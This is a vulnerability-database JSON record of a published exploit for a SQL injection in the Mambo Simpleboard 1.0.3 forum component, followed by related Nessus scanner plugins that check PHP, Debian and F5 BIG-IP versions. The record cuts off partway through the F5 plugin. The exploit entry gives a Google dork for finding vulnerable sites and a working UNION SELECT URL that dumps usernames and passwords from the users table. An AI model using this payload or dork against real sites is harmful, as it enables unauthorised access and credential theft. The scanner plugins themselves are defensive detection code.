{"published": "2008-02-27T00:00:00", "id": "1337DAY-ID-2700", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:00:21", "bulletin": {"published": "2008-02-27T00:00:00", "id": "1337DAY-ID-2700", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T02:00:21"}}, "hash": "d1a23930002eb7a0eb868fa65d986878fc104b50db89adea1e7a8a308e786dc2", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:00:21", "edition": 1, "title": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/2700", "modified": "2008-02-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/2700", "references": [], "reporter": "0day Today Team", "sourceData": "=====================================================================\r\nMambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n#########################################################\r\n##\r\n## Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)\r\n##\r\n#########################################################\r\n##\r\n## Dork: inurl:\"index.php?option=com_simpleboard\"\r\n##\r\n#########################################################\r\n \r\n Exploit:\r\n\r\nhttp://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*\r\n\r\n\r\n\r\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0e4a74c389c79c0985e77bdb8fda6084", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8031a16cbe4f9ee1e140037f319965c4", "key": "sourceData"}, {"hash": "834d280d81416740023813758b154624", "key": "href"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "194c095395600d2287300f0f2eb4954e", "key": "published"}, {"hash": "2ca0d68cf2f4cd6440bd661e15d54d57", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "194c095395600d2287300f0f2eb4954e", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "f6964fc8284aa96751199f5b2c57528204e87ca454d60e56274e0606f28fc464", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["DEBIAN_DLA-1234.NASL", "PHP_7_0_25.NASL", "PHP_5_6_32.NASL", "PHP_7_1_11.NASL", "F5_BIGIP_SOL52320548.NASL", "OPENSUSE-2017-663.NASL", "SUSE_SU-2017-1454-1.NASL", "UBUNTU_USN-3294-1.NASL", "EULEROS_SA-2017-1002.NASL"]}, {"type": "f5", "idList": ["F5:K52320548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811536", "OPENVAS:1361412562310843174", "OPENVAS:1361412562310140193", "OPENVAS:1361412562310140179"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4"]}, {"type": "ubuntu", "idList": ["USN-3294-1"]}, {"type": "thn", "idList": ["THN:F95BED040A4B56A9B0A6D552DB79AEE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-27146"]}, {"type": "seebug", "idList": ["SSV:92725"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141350"]}], "modified": "2018-01-09T13:23:20"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-01-09T13:23:20", "edition": 2, "title": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/2700", "modified": "2008-02-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/2700", "references": [], "reporter": "0day Today Team", "sourceData": "=====================================================================\r\nMambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n#########################################################\r\n##\r\n## Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)\r\n##\r\n#########################################################\r\n##\r\n## Dork: inurl:\"index.php?option=com_simpleboard\"\r\n##\r\n#########################################################\r\n \r\n Exploit:\r\n\r\nhttp://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*\r\n\r\n\r\n\r\r\n\n\n# 0day.today [2018-01-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "7409afb41acf4575f263af4f3f11a6d2", "key": "href"}, {"hash": "194c095395600d2287300f0f2eb4954e", "key": "modified"}, {"hash": "194c095395600d2287300f0f2eb4954e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d852f945973b38d7222d751bcb2187eb", "key": "sourceData"}, {"hash": "11f84c83d6c72eab84e4497378761e5b", "key": "sourceHref"}, {"hash": "0e4a74c389c79c0985e77bdb8fda6084", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"nessus": [{"lastseen": "2019-02-21T01:35:18", "bulletinFamily": "scanner", "description": "The patch introduced in DLA-1234-1 had a problem that caused gdk-pixbuf's gif module to fail to load.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 2.26.1-1+deb7u8.\n\nWe recommend that you upgrade your gdk-pixbuf packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-01-10T00:00:00", "id": "DEBIAN_DLA-1234.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105661", "published": "2018-01-09T00:00:00", "title": "Debian DLA-1234-2 : gdk-pixbuf regression update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1234-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105661);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/10 15:14:44 $\");\n\n script_name(english:\"Debian DLA-1234-2 : gdk-pixbuf regression update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The patch introduced in DLA-1234-1 had a problem that caused\ngdk-pixbuf's gif module to fail to load.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.26.1-1+deb7u8.\n\nWe recommend that you upgrade your gdk-pixbuf packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/gdk-pixbuf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gir1.2-gdkpixbuf-2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"gir1.2-gdkpixbuf-2.0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-common\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-dev\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-doc\", reference:\"2.26.1-1+deb7u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:33:58", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote web server is 7.1.x prior to 7.1.11. It is, therefore, affected by multiple vulnerabilities.", "modified": "2018-07-24T00:00:00", "id": "PHP_7_1_11.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104633", "published": "2017-11-16T00:00:00", "title": "PHP 7.1.x < 7.1.11 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104633);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.1.x < 7.1.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.1.x prior to 7.1.11. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.1.11\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.1.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.1)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.1\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.1.x\", port);\n\nfix = \"7.1.11\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:33:58", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.32. It is, therefore, affected by multiple vulnerabilities.", "modified": "2018-12-07T00:00:00", "id": "PHP_5_6_32.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104631", "published": "2017-11-16T00:00:00", "title": "PHP 5.6.x < 5.6.32 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104631);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/12/07 17:08:17\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 5.6.x < 5.6.32 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 5.6.x prior to 5.6.32. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.6.32\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nfix = \"5.6.32\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:33:58", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.25. It is, therefore, affected by multiple vulnerabilities.", "modified": "2018-07-24T00:00:00", "id": "PHP_7_0_25.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104632", "published": "2017-11-16T00:00:00", "title": "PHP 7.0.x < 7.0.25 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104632);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.0.x < 7.0.25 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.0.x prior to 7.0.25. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.25\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.25 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.x\", port);\n\nfix = \"7.0.25\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:33:00", "bulletinFamily": "scanner", "description": "An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed by an application using the Expat library, would cause that application to stop responding orpossiblyrun arbitrary code with the permission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web Application Security Editor,can exploit the vulnerability and gain full control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over the management port and self IP addresses when the Port Lockdown setting is set to Default , All , or Custom with TCP port 4353 included. The impact for the big3d process is a temporary disruption in the communicationbetween peer systems until the system automatically restarts the big3d process.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL52320548.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103313", "published": "2017-09-19T00:00:00", "title": "F5 Networks BIG-IP : Expat vulnerability (K52320548)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52320548.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103313);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/04 10:03:41\");\n\n script_cve_id(\"CVE-2016-0718\");\n\n script_name(english:\"F5 Networks BIG-IP : Expat vulnerability (K52320548)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An out-of-bounds read flaw was found in the way Expat processed\ncertain input. A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding orpossiblyrun arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor,can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default , All , or Custom with TCP port 4353\nincluded. The impact for the big3d process is a temporary disruption\nin the communicationbetween peer systems until the system\nautomatically restarts the big3d process.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K52320548\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52320548.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52320548\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = 